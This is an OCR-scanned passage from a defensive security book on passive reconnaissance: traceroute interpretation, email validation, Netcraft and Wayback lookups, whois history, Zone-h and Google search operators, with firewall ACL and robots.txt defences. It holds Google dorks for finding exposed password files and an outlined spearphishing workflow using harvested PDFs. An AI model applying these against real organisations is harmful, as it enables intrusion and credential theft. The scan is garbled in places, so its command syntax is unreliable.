AutoWhols 3 [ 0 ©  70.85.127.105 po51.dsr01.dlistx3.theplanet.com 
TcpQuery 
AnalyzePath 4 o o O 70.87.253.1 et3-1.ibr03.dlistx3.theplanet.com 
5 o o O 70.87.253.178 b2.fd.5746.static.theplanet.com 
Web hosting 
comparisons 6 22 22 23 216.115.96.58 as-3.pat2.dnx.yahoo.com 
7 55 47 47  216.115.101.128 as-O.pat1.pao.yahoo.com 
Shared hosting 
ETC 8 48 48 47 216.115.101.33 ae-2.pat2.pao.yahoo.com 
Dedicated hosting 9 49 50 50 216.115.107.51  ae0-p14i.msri.sp1.yahoo.com 


10 50 50 47  209.131.32.21 te-9-1.bas-ai.spl.yahoo.com 
11 49 50 SO  209.131.36.159 b1.www.vip.sp1.yahoo.com 


Trace complete 


Service scan 
FTP -21 

SMTP - 25 Li 
HTTP - 80 HT 


301 Moved Permanently 


yahoo.con/ 
e 


e 
ype: text/html; charseteutf-8 
POP3 - 110 
IMAP - 143 


Traceroute: Interpretation of DNS 


One of the most interesting things about traceroute is interpreting DNS entries across these links. 
Hackers can easily determine the locations of the routers themselves, the OS being used, interface 
types and names, what the router is being used for, and the relationships between the different car- 
riers! This is a very valuable tool! We can also spot where DNS changes between providers, which 
allow us to focus our target. However, sometimes we get no DNS translation at all, maybe because 
traceroute is being blocked by the device. 


E te-3-2-10g.ar5.nycl.gblx.net (208.51.134.25) 727.945 ms 395.706 ms 433.280 ms 
W 204.245.39.226 (204.245.39.226) 711.936ms 801.340 ms 768.942 ms 

Em xe-3-0-0.msr2.ac2 yahoo.com (216.115.108.135) 725.340 ms 

Em te-8-1.bas-al.ac4.yahoo.com (76.13.0.173) 143.607 ms 


This is an output of four hops of a traceroute, in the first hop the hacker will see te. 

To put this in some context, te£ is typically an interface assignment for 10-GB Ethernet on a 
Cisco network device. Additionally, the first hop is located in New York City, and the "ar" in this 
hop is typically found on customer designated routers as it is important to differentiate between 
different tiers of routers and their customers. 

Here's an example of three other select hops: 


m sl-crsl-nyc-0-6-0-0.sprintlink.net (144.232.24.97) 525.976 ms 765.292 ms 
E nyc-brdr-01.inet.qwest.net (205.171.1.133) 931.210 ms 506.813 ms 
B nyc-core-02.inet.qwest.net (205.171.134.9) 483.446 ms 680.371 ms 
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Obviously, here the hacker can leverage the fact that he can tell the difference between the ISP link 
and the border and even the core router! Obviously he would then go into more direct scanning 
techniques in determining the router type and Cisco IOS (internetwork operating system) version 
information. What might the hacker want to focus his efforts on? 

You can defend against this by disabling all unused services! This is a constant theme through- 
out this book! In order to block a traceroute on your network, just make sure that the response 
messages aren't able to egress back to the originator. Therefore, on your firewall you could block 
ICMP outbound of your network, and/or UDP ports 33494-33534. This would at least block the 
default ICMP reply and the initial request inside your network. The best policy is to whitelist a 
firewall. Only open up the ports that are positively allowed inside and outside your network. For 
inbound communications, you would only allow out standard ports for your organization and 
block everything else. Its important to note because of firewalls, traceroute is rarely going to work 
externally against the network. However, knowing the multiple methods will allow for further 
recon techniques in direct recon inside the network. Most hackers will use the TCP method 
anyway, and typically will target a port that they know is open, such as 80 or 25, externally. But 
just in case you need a refresher on a Cisco device creating an ACL, here is how to create an ACL: 


Router>enable 

Router#configure terminal 

Router(config)#access-list 101 deny icmp any any echo 
Router(config)#access-list 101 deny udp any anygt 32768 


Remember there is an implicit deny at the end of an ACL on Cisco devices, so you might need 
to permit things: 


B Router(config)# access-list 101 permit any any 


Remember your access list doesn’t do you any good unless you assign it to an interface. So, go 
into interface mode from global configuration mode: 


B Router(config)# interface EthO 
B Router(config-if)# ip access-group 101 out 


This will assign the ACL outbound to your Eth0 interface; you need to make sure if you need 
to assign an ACL inbound or outbound. Ideally though, you should have only trusted networks 
respond to an ICMP request. Also, you should only do whitelisting for ACLs. Therefore, Cisco 
recommends creating an extended access list and only permitting them from the trusted networks 
and denying all other ICMP. 


H 

ip access-list extended ACL-TRANSIT-IN 

1 

1--- Permit ICMP packets from trusted networks only 
! 

permit icmp host <trusted-networks> any 

1 

l=-== Deny all other IP traffic to any network device 


1 


deny icmp any any 
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For more information, visit http://www.cisco.com/en/US/tech/tk648/tk361/technologies_ 
tech_note09186a0080120f48.shtml. This contains common hardening techniques by Cisco to 
harden IOS devices. This is one of the best technical guides out there for securing Cisco devices. 


Disable Unused Services 


Once again disable all unused services! This is a constant theme throughout this book! This section 
of this chapter came very close to getting into direct recon, however, there are many capabilities 
that can be done indirectly and directly. This fit because Central Ops can do all the tracerouting 
for you. 


Domain Check: Central Ops 


This feature of Central Ops tells whether a domain is available. These are used to see whether a 
domain is available for the taking. Pretty straightforward! 


Email Dossier: Central Ops 


Free online network utilities - traceroute, nslookup, automatic whois lookup, ping, finger 
E | >ii + |E hup://centralops.net/co/ € | (Qv Google (5) 


Central Ops -MEt 550 internet titties 


Utiliti H 
= Dossier Investigate email addresses 


Domain Dossier —————— 
Domain Check email address  email.testghotmail.com 904 
Email Dossier 


Browser Mirror user: 32.172.185.157 [anonymous] 44/50 " x 
log in | get account Legati Ups diet 
Ping 
Traceroute 
NsLookup 
AutoWhois 


TcpQuery Validation results 
AnalyzePath 


Utilities About 


Validating email.test@hotmail.com... 


Web hosting confidence rating: 0 - Bad address 


comparisons error : RecipientRejected - Mail server rejected the email address. 
Shared hosting canonical address: <email.test@hotmail.com> $} 

VPS hosting 
Dedicated hosting 


MX records 


preference exchange IP address (if included) 
5 mxi.hotmail.com [65.55.92.184] 
5 mx2.hotmail.com [65.55.37.72] 
5 mx3.hotmail.com [65.55.37.88] 
5 


mx4.hotmail.com 


SMTP session 

[Contacting mxl.hotmail.com [65.55.92.184]...] 

C ected] 

220 snt0-mc4-f33.Snt0.hotmail.com Sending unsolicited commercial or bulk 4 
e-mail to Microsoft's computer network is prohibited. Other restrictions Y 


196 m Defense against the Black Arts 


The hacker can use the email dossier to validate an email address. To see whether or not an email 
will or will not go through, you can actually view the SMTP session created. This tool is great for 
hackers because they can validate email addresses before crafting spearfish emails to the attacker. 
A spearfish is like a phishing email—a fake email that claims it is legitimate; however, with a 
spearfish it is more targeted to the user. An example of this is sending a legitimate-looking email 
from one individual to, say, the IT manager that the hacker is confident is a safe-looking email 
or attachment to open. This is a very common technique used in during the initial compromise 
in an intrusion, especially among the advanced persistent threat. This is just another way for the 
attacker to plan the attack. Additionally, this can be used to obtain the IP addresses of the email 
server, which is likely located inside the demilitarized zone (DMZ), which can be used as another 
avenue of attack. 


Site Report: Netcraft.com 


Site report for www.twitter.com 
L3 | > | | + | @hup://toolbar.netcraft.com/site_report?url=http:/ /www.twitter.com C | (Q7 Google 


leTCRÁFT | 
Site report for www.twitter.com ———— 


Site http://www.twitter.com Last reboot unknown 
Netcraft Toolbar Uptime graph 
j Home Domain twitter.com Netblock NTT America, Inc. 
«| Download Now! = 
») Reporta Phish IPaddress 128.121.146.100 Site rank 5314 
» Tella Friend Country Eus Nameserver nsi.p26.dynect.net 
* Top Reporters Date first June 1999 DNS admin zone- 
+) Phishiest Countries seen admin@dyndns.com 
+) Phishiest Hosters Domain godaddy.com Reverse unknown 
+) Most Popular Websites Registry DNS 
2) Branded Toolbars Organisation Twitter, Inc. Nameserver unknown 
Organisation 
Search... B ————— x 
Check Netcraft Site K] Goge -— 
another site: Report [More Netcraft 
Toolbar Support Gadget Gadgets] 
» FAQ 
+) Glossary 
+) ContactUs 
+) Reporta Bug he 
Tutorials Í 


Netcraft is another third-party website that a hacker can use to get up-to-date web statistics of a 
site. As you can see from this screenshot, it will give you the site address, the domain, who owns 
the network block of IP addresses, and who registered the domain. 

If the hacker clicks on the last reboot time, we can see that this website consistently stores 
information about this site, such as what OS is being run, what type of server is being run, such 
as Apache, the date that it was changed, and the IP address of the server. As we can see from this 
example, in all these instances Twitter was successful in limiting the recon on OS fingerprinting 
to one address, which shows Linux. However, as most hackers and administrators know, if they 
are running Apache web server they are probably running some form of Linux. Therefore, we may 
want to further investigate 168.143.161.20 since it may not be as well secured as all the others. 


OS, Web Server and Hosting History for www.twitter.com 


http:/Awww twitter.com was running Apache on unknown 
when last queried at 17-Oct-2009 15:51:29 GMT - refresh now Site Report FAQ 
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Try outthe Netcraft Toolbar! 

os Server Lastchanged IP address Netblock Owner 
unknown Apache 14-Oct-2009 168.143.162.100 NTT America, Inc. 
unknown Apache 13-Oct-2009 128.121.146.100 NTT America, Inc. 
unknown Apache 12-Oct-2009  168.143.162.36 NTT America, Inc. 
unknown Apache 11-Oct-2009 — 168.143.162.68 NTT America, Inc. 
Linux Apache 10-Oct-2009 168.143.161.20 NTT America, Inc. 
unknown Apache 9-Oct-2009 168.143.162.100 NTT America, Inc. 
unknown Apache 8-Oct-2009 128.121.146.100 NTT America, Inc. 
unknown Apache 7-Oct-2009 128.121.146.228 NTT America, Inc. 
unknown Apache 6-Oct-2009 168.143.162.100 NTT America, Inc. 
unknown Apache 6-Oct-2009 168.143.162.100 NTT America, Inc. 


Additionally, in this example the hacker can then go and look at another web server as part of 
this domain. And, in the example below, we can see specifically what version of Linux is being run 
and the specific version of Apache. 


000 


Site report for status.twitter.com 


[a | > | | + Liflintp://toolbar.netcraft.com/site reportturl- http://status.twitter.com 


[d } (Q7 Google i 


+) Glossary 
+) ContactUs 
+) Reporta Bug 


Tutorials 


+) Installing the Toolbar 
+) Using the Toolbar 

+) Getting the Most 

+» Reporting a Phish 

+) Configuration 


About Netcraft 


+) Netcraft Home 

+) About Netcraft 

+) Website Terms of Use 
+) Phishing Site Feed 

+) Security Services 

+) Contact Us 


Hosting History 


Netblock Owner 


Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 
Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 
Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 
Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 
Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 


Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 


Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 
Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 
Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 


Michael Glenn 419 Park Avenue South 
Room 807 New York NY US 10016 


——--.-- 


72.32.231.8 


72.32.231.8 


72.32.231.8 


72.32.231.8 


72.32.231.8 


72.32.231.8 


72.32.231.8 


72.32.231.8 


72.32.231.8 


72.32.231.8 


COPYRIGHT © NETCRAFT LTD. 2010 


OS Web Server 
Linux Apache/2.2.3 
Red Hat 


Linux Apache/2.2.3 
CentOS 

Linux Apache/2.2.3 
Red Hat 


Linux Apache/2.2.3 
CentOS 


Linux Apache/2.2.3 
Red Hat 


Linux Apache/2.2.3 
CentOS 


Linux Apache/2.2.3 
Red Hat 


Linux Apache/2.2.3 
CentOS 

Linux Apache/2.2.3 
Red Hat 


Linux Apache/2.2.3 
CentOS 


Last 
changed 
1-Jul- 
2010 
30-Jun- 
2010 
25-Jun- 
2010 
24-Jun- 
2010 
22-Jun- 
2010 
21-Jun- 
2010 
19-Jun- 
2010 
17-Jun- 
2010 
3-Jun- 
2010 
2-Jun- 
2010 


4 


Here we can see there is a Linux server running Red Hat Linux using Apache/2.2.3. As of the 


time of this writing, Apache is running at 2.2.15. The hacker then could use this information to 
do more direct research and vulnerability scanning, as discussed in the next chapter. 
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Wayback Machine: Archive.org 


Archive.org maintains the Wayback Machine, which creates snapshots on a periodic basis of web- 
sites for review, basically allowing you to view web pages that are no longer hosted on the website. 
According to the website, the Wayback Machine maintains 56 billion website captures dating as 
far back as 1996. This is important to hackers because they can use this for their research, espe- 
cially when companies have realized that they might have had compromising information on their 
website and may have taken it down. Using the Wayback Machine, the hacker can leverage their 
research for any period of time, which will give him clues to additional avenues of attack that may 
be available to him. 


000 Internet Archive Wayback Machine 
La |e | | + JIM htp://web.archive.org/web/" http: /www.yahoo.com ¢ | @ ©) 
— D 
URP 
Enter Web Address: CED Take Me Bac. A. Search Compare Ar 
Searched for http://www.yahoo.com 7439 Results 
om 


Note some duplicates are not shown. Seo all 
* denotes when site was updated. 
Material typically becomes available here 6 months after collection. See FAQ. 


Search Results for Jan 01, 1996 - Apr 21, 2009 
1996 1997 1998 1999 2000 2001 2002 2003 2004 
12 pages 27 pages 26 pages 36 pages 219 pages 2963 pages 244 pages 134 pages 413 pages 
Oct 17. 1996 = Jan 09, 1997 = Feb 10, 1998 = Jan 16, 1999 = Feb 29. 2000 = Jan 24, 2001 = Jan 23, 2002 = Jan 22, 2003 = Jan 01, 2004 
Oct 20, 1996 = Jan 24, 1997 = Feb 10, 1998 = Feb 29, 2000 * = Jan 25, 2002 = Jan 25,2003 Jan 01, 2004 
= Feb 01, 1997 * Feb 13, 1998 = Jan 17, 1999 = Feb 29, 2000 = Mar 05, 2001 = Feb 02, 2002 

Oct 23, 1996 * Feb 09, 1997 * Feb 13, 1998 = Feb 08, 1999 = Mar 01, 2000 * Mar 05, 2001 = 
Nov 28, 1996 = Feb 27, 1997 * Feb 14, 1998 = Feb 08, 1999 = Mar 01, 2000 * Mar 06, 2001 = Apr 02, 2002 
Dec 19, 1996 = Mar 30, 1997 * Feb 15, 1998 * Feb 08, 1999 = * 1 = Apr 02, 2002 


Feb 02, 2003 ‘a 
Feb 04, 2003 * Jan 13, 2004 * 


E Feb 06,2003 Jan 14, 2004 
Mar 02, 2000 * Mar 31, 2001 * May 23, 2002 
x 


wea a CREDE EE 


: 
: 
| 
: 
: 
! 


As you can see in this example, this page contains thousands of snapshots of www.yahoo.com 
ranging from January 1996 to the present. 


e00 Yahoo 


[»- Js [Ifl neep://web.archive.org/web/19990117061135/nttp://ww © | (Q7 Google ©) 


Yahoo! Mail - free email account - use it from home, school, work 


E * News and Media Xtra! 
* Business and Economy [Xtra!] * Recreation and Sports [Xtra!] 
E Companies, Finance. Employment... Sports, Games, Travel, Autos, Outdoors. 
e Computers and Internet [Xtra!] © Reference L 
Intemet, WWW, Software, Multimedia... Libraries, Dictionaries, Phone Numbers. a 
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How to Defend against This 


One of the ways to prevent automatic crawlers from crawling your website is to provide in the root 
of your web server a robots.txt file. Web administrators set up robots.txt files to prevent legitimate 
crawlers from crawling certain directories for their websites. Just because there is a robots.txt file 
doesn't mean websites can't crawl and archive the content, but this does work for archive.org. 


1. Create a file called robots.txt. 
2. Inside create these two lines: 
— User-agent: * 
— Disallow: / 
3. Place this in your root folder on your website. 


As you can see from these two entries, the “*” means that this applies to all bots, and the “/” means 
the entire site. For more information on this please see http://support.microsoft.com/kb/217103 
and http://www.robotstxt.org/robotstxt-html. 


Whois History: DomainTools.org 


DomainTools.org also provides also provides domain search, ping, traceroute, reverse IP, and 
domain history tools. One of the unique things about this website is that it provides an extensive 
database of whois history throughout time. So if a domain changes ownership, there are records 
of the previous owners and information that we have leveraged previously. As you can see in this 
image they have 2785 previous records for previous whois entries for Yahoo.com. Additionally, 
with this site they have monitoring capabilities that could allow a hacker to monitor other name 
servers to keep track of additional domains the target uses. 


000 Domain Tools: View Historical Whois Records 
[a | > | | + [$ np://domain-history.domaintools.com/?q=yahoo.com&page=results&submit=Look+up#results_table (ZZE C | (Qr domain toos ©) 


We have 2785 historical whois records for Yahoo.com. 
Here is a complete list of dates that we have whois records for. 


Upgrade your membership to view the historical whois records! 
L 200: | 
2001-10-05 2002-07-15 2003-01-01 2004-01-01 2005-01-01 2006-01-01 2007-01-01 2008-01-01 2009-01-01 2010-01-01 
2002-07-18 2003-01-02 2004-01-02 2005-01-02 2006-01-02 2007-01-02 | 2008-01-02 2009-01-02 | 2010-01-02 
2002-07-19 2003-01-03 2004-01-03 2005-01-03 2006-01-03 2007-01-03 2008-01-03 2009-01-03 2010-01-03 
2002-07-20 2003-01-04 2004-01-04 2005-01-04 | 2006-01-04 2007-01-04 2008-01-04 | 2009-01-04 | 2010-01-04 
2002-08-01 2003-01-05 2004-01-05 2005-01-05 2006-01-05 2007-01-05 2008-01-05 2009-01-05 2010-01-05 
2002-08-02 2003-01-06 2004-01-06 2005-01-06 | 2006-01-06 2007-01-06 2008-01-06 | 2009-01-06 | 2010-01-06 
2002-08-04 2003-01-07. 2004-01-07 2005-01-07 2006-01-07 2007-01-07 2008-01-07 2009-01-07 2010-01-07 
2002-08-0S 2003-01-08 2004-01-08 2005-01-08 | 2006-01-08 2007-01-08 2008-01-08 | 2009-01-08 | 2010-01-08 


2002-08-06 2004-01-09 2005-01-09 2006-01-09 2007-01-09 2008-01-09 2009-01-09 2010-01-09 
2002-08-07 2004-01-10 2005-01-10 | 2006-01-10 2007-01-10 2008-01-10 2009-01-10 2010-01-10 
2002-08-09 2004-01-11 2005-01-11 2006-01-11 2007-01-11 2008-01-11 2009-01-11 2010-01-11 
2002-08-10 2004-01-12 2005-01-12 | 2006-01-12 2007-01-12 2008-01-12 2009-01-12 | 2010-01-12 
2002-08-12 2004-01-13 | 2005-01-13 | 2006-01-13 2007-01-13 2008-01-13 2009-01-13 5 
2002-08-13 2004-01-14 | 2005-01-14 | 2006-01-14 2007-01-14 2008-01-14 2009-01-14 


2002-08-14 2004-01-15 2005-01-15 20-01-15 2007-01-15 | 2008-01-15 | 2009-01-15 - 
2002-08-17 2003-01-16 2004-01-16 2005-01-16 | 2006-01-16 2007-01-16 2008-01-16 2009-01-16 2010-01-16 
2002-08-18 2003-01-17 2004-01-17 | 2005-01-17 | 2006-01-17 2007-01-17 2008-01-17 2009-01-17 2010-01-17 
2002-08-19 2003-01-18 | 2004-01-18 | 2005-01-18 | 2006-01-18 2007-01-18 2008-01-18 2009-01-18 2010-01-18 
2002-08-22 2003-01-19 2004-01-19 | 2005-01-19 | 2006-01-19 2007-01-19 2008-01-19 2009-01-19 2010-01-19 
2002-08-23 2003-01-20 2004-01-20 2005-01-20 | 2006-01-20 2007-01-20 2008-01-20 2009-01-20 2010-01-20 
2002-08-24 2003-01-21 2004-01-21 2005-01-21 2006-01-21 2007-01-21 2008-01-21 2009-01-21 2010-01-21 
2002-08-25 2003-01-22 2004-01-22 2005-01-22 2006-01-22 2007-01-22 2008-01-22 2009-01-22 2010-01-22 
2002-08-26 2003-01-23 2004-01-23 2005-01-23 2006-01-23 2007-01-23 2008-01-23 2009-01-23 2010-01-23 
2002-08-27 2003-01-24 2004-01-24 2005-01-24 2006-01-24 2007-01-24 2008-01-24 2009-01-24 2010-01-24 
2002-08-29 2003-01-25 2004-01-25 2005-01-25 2006-01-25 2007-01-25 2008-01-25 2009-01-25 2010-01-25 
2002-08-30 2003-01-26 2004-01-26 2005-01-26 2006-01-26 2007-01-26 2008-01-26 2009-01-26 2010-01-26 
2002-08-31 2003-01-27 2004-01-27 2005-01-27 2006-01-27 2007-01-27 2008-01-27 2009-01-27 2010-01-27 
2002-09-01 2003-01-28 2004-01-28 2005-01-28 2006-01-28 2007-01-28 2008-01-28 2009-01-28 2010-01-28 
2002-09-02 2003-01-31 2004-01-29 2005-01-29 2006-01-29 2007-01-29 2008-01-29 2009-01-29 2010-01-29 
2002-09-03 2003-02-01 2004-01-30 2005-01-30 2006-01-30 2007-01-30 2008-01-30 2009-01-30 2010-01-30 
2002-09-04 2003-02-02 2004-01-31 2005-01-31 2006-01-31 2007-01-31 2008-01-31 2009-01-31 2010-01-31 
2002-09-05 2003-02-03 2004-02-01 2005-02-01 2006-02-01 2007-02-01 2008-02-01 2009-02-01 2010-02-01 
2002-09-06 2003-02-04 2004-02-02 2005-02-02 2006-02-02 2007-02-02 2008-02-02 2009-02-02 2010-02-02 
2002-09-08 2003-02-06 2004-02-03 2005-02-03 2006-02-03 2007-02-03 2008-02-03 2009-02-03 2010-02-03 
2002-09-09 2003-02-07 2004-02-04 2005-02-04 | 2006-02-04 2007-02-04 2008-02-04 2009-02-04 2010-02-04 


SENS: 
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Zone-h.org 


Zone-h is the defacement archive of hacking. Many times when hackers have defaced a website or 
organization they will go and submit anonymously to Zone-h. Using Zone-h, they can see if other 
hackers were able to exploit any other vulnerabilities of a certain site, and what types of vulner- 
abilities are available to exploit. Also, they list operating and version information for further direct 
recon in order to exploit. 


(eoo Zone-H.org - Unrestricted information 


[sje e|  hp://zone-h.com/ e I Or Coole Sd 


Home News Archive Archive *€ Onhold Notify 


10/09/2009 WrRten by Marcelo Ameise (Vympel) zone-h in numbers 


“The FBI (Federal Bureau of Investigation) is seeking a senior security consultant for a 
permanent position." This is probably the next job offer that will appear on the FBI job 
site (fbijobs.gov) as they got defaced yesterday. 


d A turkish crew, known as turkguvenligl.info, managed to exploit a SQL injection flaw 
& and insert a record that redirected the "events" page to an image with their site name. 


Super Administrators: 2 


Downloadable Files: 
Digital Attacks: 3451342 
Attacks On Hold: 1944 

Online Users: 


uo sisevetisaweeucbeacebeeusseaascssasessesuasenqsusuewseseseasessusesddudsewssususawecewscasvassSeuss latest defacements 


" = forum.1919turk.net 
—€——— forum.1919turk.com 


vı Since Zone-H started its mirroring activity of defacements, it www.1919turk.net 

4 always witnessed any sort of hacktivism. Sure, most of the 

X» M times defacers are/were/will be just defacing "just for the www.1919turk.com 

pleasure of it* but when it comes the time of big protests www.artestexturas.com.br 
related to world's events, we are used to see h regular 

defacers or improvized cyber protesters taking a stand and www.brandocom.com.br 
spell out their disappointments by posting something using the www.cobrate.com.br 
Seen en www.aureasom.com.br 
M) Because... yes... defacement is a media, it has been proven www.fenatresc.com.br 
gl in several occasion that by defacing just one well targeted www.devorer.com.br 


website, defacers were capable to attract the attention of 
regular medias which were reporting his message to the world. 


Today, 1 was reading the news related to the clashes 
happening right now after the results of the Iranian political election which has been won by Mahmoud Ahmadinejad 
with a percentage that usually belongs only to countries ruled by a strong dictatorship and that any sort of statistical 
analysis would label at least as an *anomaly*. 


But what happened in the cyber-world? Did we witness any sort of digital protest as we used to see in the past like 
those related to the Kashmir dispute? Or something like the Estonian bronze statue protest? Or even the Prophet 
Mohammed cartoon protest? 


are 


Indirect Web Browsing and Crawling 


One of the best ways to do indirect research against a target is to examine the website itself though 
a search engine. The website can contain many clues for the attacker to aid in his research and 
his attack. Using the website and search engines the hacker can search through everything on the 
domain. Like using the whois method, the hacker can find usernames, email addresses, accounts, 
passwords, technical information, and much more. It all depends on their ability to craft certain 
queries. Hackers can use structured queries to identify specific page URLs, document titles, host 
names, links, and even files such as PDFs and documents. 

Also, we can use the information in the website to infer certain things. For instance, we can 
look at an enterprise's job postings for the information technology department, and the technical 
skills they require may infer what technologies they are using. For instance, the postings could 
include a job ID for a Sharepoint Administrator, or an Apache Administrator, and more with 
specific OS version information. The easiest way to search information about a website is to use a 
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search engine against it; this is indirect research as the search provider will be performing all of the 
queries. This helps prevent the attacker the attacker from being caught and leaving behind artifacts. 


Indirect Research: Google.com 


One of the best search engines out there is Google, which gives the hacker much flexibility when 
performing searches. The hacker can combine many different commands as part of the Google 
search engine to give him back the specific information he is looking for. However, the hacker 
needs to know the various switches available to him to exclude and include terms. 


Google Search Commands 


Search Term Description 

site: This allows you to search entire domains. 
site:*.gov 

-Excludes This allows you to exclude certain terms in your results. 
-facebook 

+Just the term This requires certain terms in your results. 
+google 

link: This allows you to search for links that link to another website. 


link:zone-h.org 


inurl: This option allows you to search in the URL for terms. 


inurl:documents 


intitle: This option allows you to search in the title for specific terms. 


intitle:” hacking” 


* jpg One of the most important, this allows you to search for files within a 
certain domain. 


Using all of the queries together, we can craft some very specific queries to gather research 
against our target. For instance using “intitle:index.of.config site:*.com” can grab the hacker 
the complete index of the website in order to further his research. Another example is password 
** txt" inurl:.txt intitle:;download site:upload.ee. This would look for all password files in .txt 
format that users uploaded on this website. 

So say for instance a hacker wants to send a spearfish with a legitimate PDF attached to an 
individual within the organization. The hacker could perform an @domain.com in order to get a 
list of email addresses using ARIN. He could then craft a Google query to search for all the PDFs 
located on the web server. For example: *.pdf sitesdomaintobehacked.com 

Using this information, the hacker would then have a list of email addresses and legitimate 
PDFs that he can add malware to and send to individuals on the network in order to compro- 
mise them. Google can recognize these techniques and block them. 
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60060 Sorry... 


E Ira | + [SG http:/;www.google.com/search?hi=en&source=hp&q=%22°. € | (Qr intitle:inc®) 


Go gle sor.. 


We're sorry... 


... but your computer or network may be sending automated 
queries. To protect our users, we can't process your request right 
now. 


See Google Help for more information. 
© 2009 Google - Google Home 


How to Defend against This 


‘The only real way to defend against this is to make sure the all-compromising information is lim- 
ited externally on the Web. Also, make sure that all Web management systems are turned off and 
not accessible outside of the network. 


Indirect Recon: Cache, Google.com 


Google also has the ability to look at old web pages via the cache that they store. This is a ver 
g y g y y 
ood tool when hackers want to learn about web pages that have been taken down or are no longer 
g pag g 
available to leverage information against them. For example, as you can see in each of the search 
g g P y 
queries you have an option called “Cached.” 


Woot : What Is Woot? 

Woot is the originator of One Day, One Deal. Every midnight (central) we launch an event: 
one sale that lives until it sells out, or the next midnight. ... 
www.woot.com/whatiswoot.aspx - Cached - Similar 


'Ihe next example shows you the date and time of the page as it appears on July 1, 2010. 
However, what hackers fail to realize is that this isn't completely passive, meaning this isn't all 
exactly in Google's cache; therefore this is not an indirect method, as the hacker is creating arti- 
facts on his possible target. The only thing stored in Google cache is text; the images are being 
pulled directly from the website itself. 


eoo Woot : What Is Woot? 


of 
could have changed in the meantime. Learn more 
These search terms are highlighted: woot com Text-only version 


woot! Log in today's woot blog ^ community 
Ld Hi are you new? Start here. 
woot faq: a discussion of ill-advised efficiencies, failed idealism, and trampled dreams. 


what is woot? e p 
What is Woot and who's behind i? 

Woot.com is an online store and community that focuses on selling cool stuff 
cheap. It started as an employee-store slash market-testing type of place for an 
electronics distributor, but it's taken on a life of its own. We anticipate 
FREQUENTLY LOOKED FOR PAGES profitability by 2043 - by then we should be retired; someone smarter might. 

take over and jack up the prices. Until then, we're still the lovable scamps 
weve always been. But don't take our word for it: see what the online 


If you have read that whole FAQ over there, 
and still have a problem/question you can write 
us 


* Our Privacy Policy 
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Therefore, if you click on text-only version, Google adds the words “&strip=1” to the web URL 
and strips out all the graphics, and this provides a more secure way of viewing the cached content 
on the website rather than connecting back to the possible target directly. 


Woot : What Is Woot? 
4 | » | | + *§m/search?q=cache:817mXOBofZY):www.woot.com/whatiswoot.aspx+woot.com&hi=en&gl=us&strip=1 Č | (Qr Google © 


D 


This is Google's cache of http://www.woot, com/whatiswoot aspx. It is a snapshot of the page as it appeared on Jul 1, 2010 21:53:16 GMT. The 
current page could have changed in the meantime. Leam more | 


These search terms are highlighted: woot com Full version 


Woot® : One Day, One Deal™ 


Log in 


Hi, are you new? Start here. 
* Today's Woot 
* Blog 
* Community 
* Write Us 
© What Is Woot? 9 


Woot is the originator of One Day, One Deal. Every midnight (central) we launch an event: one sale that lives until it sells out, or the next 
midnight. 
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Indirect Research: Google Hacking Database 


Johnny Long, a well-known hacker, maintains a database filled with unique Google search queries 
that give back valuable information. There are very easy ways to do fingerprinting, such as find- 
ing known versions, password lists, or even administration back ends to some servers or network 
devices. For more information on unique Google queries check out http://www.hackersforcharity. 


org/ghdb/. 


IHS | GHDB 
ale + Omp wena nackersforchariy.ora/ohdbrfuncion=summi cate? E c | (Qr google hacking data®) 


Indirect Research: Imgtfy.com 


LMGTFY stands for “Let Me Google That For You.” So now if your coworkers see you reading 
this book on computer hacking, and ask you questions about it, you can just point them to the 
link from this website. Go to the site, enter their question, and give them the link back. Then you 
can get a kick out of their reaction. 
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eoo Let me google that for you 


try http://Imgtfy.com/?q whatis-- 127.0.0.1 e 


let me Go O gle that for you 


what is 127.0.0.1 


Google Search | I'm Feeling Lucky | 


Was that so hard? 


About Privacy @LMGTFY Live Stream Contact Advertise for $199 


——————————————————————————— 
Indirect Research: Duckduckgo.com 
This is a good website just to get quick relevant information back on a subject, for instance, if you 
don't know a term or don't know what a specific thing is. 

It's almost impossible to defend against crafted third-party web queries. However, you may be 
able to monitor when websites like the ones described above are querying and how they are doing 
it. You would have to perform some log analysis in order to do that. Logs are located in Apache at 
/var/log/http. In Linux use your favorite text editor to open up this file. 


The logs in Windows are located in Windows\System32\Logfiles. Logfiles and these files can 
be opened with Wordpad or Notepad. 


Summary 


From this chapter, remember it's all about how hackers go about researching the targets they wish 
to attack. Hackers are targeting something specific, and need to find many different avenues and 
routes to get to that specific target in order to attack and gather as much information as they can. 
If they are able to obtain the research that they need discretely, then they will be highly successful 
in their attack and in finding specific vulnerabilities to exploit. The important part of this chapter 
is performing indirect research on possible targets. Exhausting indirect methods allows the hacker 
to decrease his likelihood of getting caught by preventing his digital footprints across the network. 
Thus, once he has the information and leads, he can perform the direct research he needs in order 
to start attacking the target. 


Chapter 8 


Capturing Network Traffic 


Overview 


In this chapter we go over the process of capturing network traffic. There are two perspectives to 
think about in regards to network traffic. First, why the hacker is collecting traffic, and second, 
why the network defender collects network traffic. For the most part, the hacker is only interested 
in network traffic to either identify new vectors of attack or to steal confidential information or 
personally identifiable information. Collecting traffic from the network defender's point of view is 
a primary asset in identifying, thwarting, and defending against network attacks. 

Therefore, it is assumed by the time the hacker has the ability to actually collect network traf- 
fic across the wire, he has already penetrated the system. This is because in order to sniff the net- 
work via a network interface card he has to have some type of access to target. Generally, in more 
secure enterprise networks wireless vectors aren't an option, and if there are wireless networks they 
may require some heavy-duty security/authentication involving multifactor authentication and 
RADIUS access and public key encryption rather than just cracking an access point using wired 
equivalent privacy (WEP) or Wi-Fi protected access (WPA) encryption. 

Therefore, in most intrusions network packet interception probably wouldn’t occur until a 
server has been exploited. As a consequence, the hacker is likely targeting the traffic to further 
move laterally through the network by identifying new Internet protocol (IP) addresses or to inter- 
cept authentication credentials of some sort. If the hacker has targeted and exploited a server then 
odds are that he can run a sniffer program on the machine. Clients typically have the ability to 
post to the server; if that is the case it’s possible to sniff their credentials used to access the server. 
However, in the case the victim isn’t used as a server. Then sniffing the network would be a much 
less favorable option. The hacker sniffing the network has access to all protocol information cross- 
